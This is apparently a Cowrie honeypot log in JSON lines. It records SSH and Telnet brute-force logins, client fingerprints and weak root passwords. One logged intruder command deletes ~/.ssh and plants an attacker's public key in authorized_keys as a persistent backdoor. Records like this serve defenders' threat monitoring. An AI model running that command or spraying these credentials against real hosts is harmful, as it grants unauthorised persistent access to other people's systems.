{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:42:26.828005Z","src_ip":"212.227.235.229","session":"21fd4b85e8fd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60944,"dst_ip":"1.2.3.4","dst_port":22,"session":"982fa5f31e73","protocol":"ssh","message":"New connection: 217.72.205.35:60944 (1.2.3.4:22) [session: 982fa5f31e73]","sensor":"my-vps","timestamp":"2025-08-26T12:42:34.222921Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:42:34.224069Z","src_ip":"217.72.205.35","session":"982fa5f31e73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44392,"dst_ip":"1.2.3.4","dst_port":22,"session":"f06d0142cd31","protocol":"ssh","message":"New connection: 212.227.235.229:44392 (1.2.3.4:22) [session: f06d0142cd31]","sensor":"my-vps","timestamp":"2025-08-26T12:44:39.046207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:44:39.047438Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:44:39.297587Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.login.success","username":"root","password":"Arun@1234","message":"login attempt [root/Arun@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:44:40.337613Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:44:40.894081Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:44:40.894886Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:44:40.895751Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:44:41.147000Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:44:42.197630Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:44:42.198340Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:44:42.449933Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:44:42.450836Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58280,"dst_ip":"1.2.3.4","dst_port":22,"session":"e998b4d709ec","protocol":"ssh","message":"New connection: 212.227.235.229:58280 (1.2.3.4:22) [session: e998b4d709ec]","sensor":"my-vps","timestamp":"2025-08-26T12:44:42.692696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:44:42.693567Z","src_ip":"212.227.235.229","session":"e998b4d709ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:44:42.939573Z","src_ip":"212.227.235.229","session":"e998b4d709ec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:44:43.966401Z","src_ip":"212.227.235.229","session":"e998b4d709ec"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:44:45.219244Z","src_ip":"212.227.235.229","session":"e998b4d709ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58282,"dst_ip":"1.2.3.4","dst_port":22,"session":"50de80c0beda","protocol":"ssh","message":"New connection: 212.227.235.229:58282 (1.2.3.4:22) [session: 50de80c0beda]","sensor":"my-vps","timestamp":"2025-08-26T12:44:45.469371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:44:45.470320Z","src_ip":"212.227.235.229","session":"50de80c0beda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:44:46.679919Z","src_ip":"212.227.235.229","session":"50de80c0beda"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:44:47.433294Z","src_ip":"212.227.235.229","session":"50de80c0beda"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:44:47.685139Z","src_ip":"212.227.235.229","session":"f06d0142cd31"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:44:47.686230Z","src_ip":"212.227.235.229","session":"50de80c0beda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58198,"dst_ip":"1.2.3.4","dst_port":22,"session":"909649ed6121","protocol":"ssh","message":"New connection: 212.227.235.229:58198 (1.2.3.4:22) [session: 909649ed6121]","sensor":"my-vps","timestamp":"2025-08-26T12:44:53.771853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:44:54.565539Z","src_ip":"212.227.235.229","session":"909649ed6121"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:44:54.566575Z","src_ip":"212.227.235.229","session":"909649ed6121"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd@12345","message":"login attempt [root/Passw0rd@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:44:58.023906Z","src_ip":"212.227.235.229","session":"909649ed6121"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:44:59.869032Z","src_ip":"212.227.235.229","session":"909649ed6121"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43840,"dst_ip":"1.2.3.4","dst_port":22,"session":"4172158380c7","protocol":"ssh","message":"New connection: 212.227.235.229:43840 (1.2.3.4:22) [session: 4172158380c7]","sensor":"my-vps","timestamp":"2025-08-26T12:46:09.767296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:46:09.768277Z","src_ip":"212.227.235.229","session":"4172158380c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:46:10.960512Z","src_ip":"212.227.235.229","session":"4172158380c7"}
{"eventid":"cowrie.login.failed","username":"patrick","password":"patrick","message":"login attempt [patrick/patrick] failed","sensor":"my-vps","timestamp":"2025-08-26T12:46:12.284201Z","src_ip":"212.227.235.229","session":"4172158380c7"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:46:13.532649Z","src_ip":"212.227.235.229","session":"4172158380c7"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":56990,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2f7db2dd09e","protocol":"ssh","message":"New connection: 93.123.109.189:56990 (1.2.3.4:22) [session: e2f7db2dd09e]","sensor":"my-vps","timestamp":"2025-08-26T12:46:19.488504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:46:19.489558Z","src_ip":"93.123.109.189","session":"e2f7db2dd09e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:46:19.507960Z","src_ip":"93.123.109.189","session":"e2f7db2dd09e"}
{"eventid":"cowrie.login.failed","username":"xray","password":"xray","message":"login attempt [xray/xray] failed","sensor":"my-vps","timestamp":"2025-08-26T12:46:19.586237Z","src_ip":"93.123.109.189","session":"e2f7db2dd09e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:46:20.700140Z","src_ip":"93.123.109.189","session":"e2f7db2dd09e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35116,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2266b84db1f","protocol":"telnet","message":"New connection: 212.227.235.229:35116 (1.2.3.4:23) [session: c2266b84db1f]","sensor":"my-vps","timestamp":"2025-08-26T12:46:33.688221Z"}
{"eventid":"cowrie.session.closed","duration":36.148478746414185,"message":"Connection lost after 36 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:47:09.836629Z","src_ip":"212.227.235.229","session":"c2266b84db1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51300,"dst_ip":"1.2.3.4","dst_port":22,"session":"1136d8825f18","protocol":"ssh","message":"New connection: 212.227.235.229:51300 (1.2.3.4:22) [session: 1136d8825f18]","sensor":"my-vps","timestamp":"2025-08-26T12:47:29.607629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:47:29.609123Z","src_ip":"212.227.235.229","session":"1136d8825f18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:47:29.853393Z","src_ip":"212.227.235.229","session":"1136d8825f18"}
{"eventid":"cowrie.login.failed","username":"wireguard","password":"wireguard","message":"login attempt [wireguard/wireguard] failed","sensor":"my-vps","timestamp":"2025-08-26T12:47:30.886000Z","src_ip":"212.227.235.229","session":"1136d8825f18"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:47:32.133371Z","src_ip":"212.227.235.229","session":"1136d8825f18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33502,"dst_ip":"1.2.3.4","dst_port":22,"session":"847fb39cf00a","protocol":"ssh","message":"New connection: 212.227.235.229:33502 (1.2.3.4:22) [session: 847fb39cf00a]","sensor":"my-vps","timestamp":"2025-08-26T12:47:36.438640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:47:36.439589Z","src_ip":"212.227.235.229","session":"847fb39cf00a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:47:36.688505Z","src_ip":"212.227.235.229","session":"847fb39cf00a"}
{"eventid":"cowrie.login.failed","username":"popuser","password":"popuser","message":"login attempt [popuser/popuser] failed","sensor":"my-vps","timestamp":"2025-08-26T12:47:37.687703Z","src_ip":"212.227.235.229","session":"847fb39cf00a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:47:38.939948Z","src_ip":"212.227.235.229","session":"847fb39cf00a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44352,"dst_ip":"1.2.3.4","dst_port":22,"session":"c417d01bc113","protocol":"ssh","message":"New connection: 212.227.235.229:44352 (1.2.3.4:22) [session: c417d01bc113]","sensor":"my-vps","timestamp":"2025-08-26T12:47:57.833258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:47:57.834304Z","src_ip":"212.227.235.229","session":"c417d01bc113"}
